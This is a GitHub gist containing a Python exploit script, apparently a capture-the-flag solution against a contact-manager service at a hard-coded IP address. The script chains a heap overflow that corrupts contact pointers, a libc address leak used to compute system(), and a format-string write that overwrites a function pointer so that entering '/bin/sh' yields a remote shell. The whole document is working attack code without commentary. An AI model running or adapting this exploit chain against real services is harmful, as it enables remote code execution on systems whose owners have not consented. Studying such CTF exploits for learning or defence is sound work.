Skip to content

Instantly share code, notes, and snippets.

@peternguyen93
Created September 21, 2015 02:37
Show Gist options
  • Save peternguyen93/478baa59191e3108d0a3 to your computer and use it in GitHub Desktop.
Save peternguyen93/478baa59191e3108d0a3 to your computer and use it in GitHub Desktop.
#!/usr/bin/python
from Pwn import *
p = Pwn(host='54.165.223.128',port=2555)
# p = Pwn()
def create_contact(name,description):
p.read_until('>>>')
p.write('1\n')
p.read_until('Name:')
p.send(name + '\n')
p.read_until('Enter Phone No:')
p.write('123123123\n')
p.read_until('Length of description:')
p.write(str(len(description) + 1) + '\n')
p.read_until('Enter description:\n\t\t')
p.send(description + '\n')
def edit_concat(**kwargs):
p.read_until('>>>')
p.write('3\n') # edit contact
p.send(kwargs['name'] + '\n')
p.read_until('>>>')
if kwargs['mode'] == 2:
p.write('2\n')
p.read_until('Length of description:')
p.write(str(len(kwargs['description']) + 1) + '\n')
p.read_until('Description:')
p.send(kwargs['description'] + '\n')
else:
p.write('1\n')
p.read_until('New name:')
p.write(kwargs['new_name'])
def exploit():
p.connect()
# raw_input('>')
create_contact('peter1','A'*79)
create_contact('peter2','A'*79)
leak = 'A'*72 + p.pack(0x0804b010) + p.pack(0x0804b010) + 'peter2'
edit_concat(name='peter1',mode=2,description=leak)
edit_concat(name='peter1',mode=1,new_name=leak)
p.read_until('>>>')
p.write('4\n')
leak = p.read_until('Menu:')
# print repr(leak)
i = leak.index('Name: peter2\n\tLength 80\n\tPhone #:') + 34
leak = p.unpack(leak[i:i + 4])
offset = p.get_libc_offset(leak,'printf')
system = leak - offset
print '[+] printf():',hex(leak)
print '[+] system():',hex(system)
create_contact('peter3','A'*79)
create_contact('peter4','A'*79)
first = system & 0xffff
second = (system >> 16) - first
fmt = '%{0}x%1$n%{1}x%9$n'.format(str(first),str(second))
# print fmt
# raw_input('>>')
payload = p.pack(0x0804b030)*(72/4)
payload+= p.pack(0x804b198) + p.pack(0x0804b030) # fake contact
payload+= fmt + '%p'*21 + p.pack(0x0804b032) + '%p'*40
edit_concat(name='peter3',mode=2,description=payload)
edit_concat(name='peter3',mode=1,new_name=payload)
p.read_until('>>>') # trigger bug
p.write('4\n')
p.read_until('>>>')
p.write('1\n')
p.read_until('Name:')
p.write('/bin/sh\n')
p.io()
exploit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment